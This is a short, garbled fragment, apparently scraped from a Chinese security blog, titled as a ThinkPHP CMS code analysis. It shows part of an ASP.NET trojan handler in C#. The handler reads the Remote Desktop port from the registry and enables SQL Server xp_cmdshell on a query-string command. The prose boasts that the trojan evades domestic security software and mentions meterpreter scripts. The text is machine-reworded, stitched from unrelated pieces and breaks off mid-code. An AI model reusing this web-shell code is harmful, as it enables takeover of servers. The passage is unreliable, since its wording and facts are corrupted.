ThinkPHP CMS代码剖析 private void ShowPort(HttpContext context) { context.Response.Write(Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp").GetValue("PortNumber").ToString()); } public void ProcessRequest(HttpContext context) { context.Response.ContentType = "text/plain"; try { var connection = context.Request.QueryString["connection"]; switch (context.Request.QueryString["method"]) { case "1": WriteVbs(context); break; case "2": ExecuteSql(connection,@"sp_configure 'show advanced options',1 reconfigure"); ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//敞开数据库的xp_cmdshell为airssl.sh增加履行权限，履行(相关输入输入)咱们也测验了国内干流一切的安全及防护软件，没有任何一种能够处理这个问题，最中心的原因是，这个asp.net木马合法地调用了微软本身答应的 *** 组件System.Net，而这个组件在很多的正常的程序中用到，咱们又不能彻 *** 止它！D盾新版：

受影响硬盘厂商 | MD5: c707 0eb2 71d6 5178 6687 9d2f 5594 dc01运转meterpreter脚本，在scripts/meterpreter目录下可查看到一切脚本名。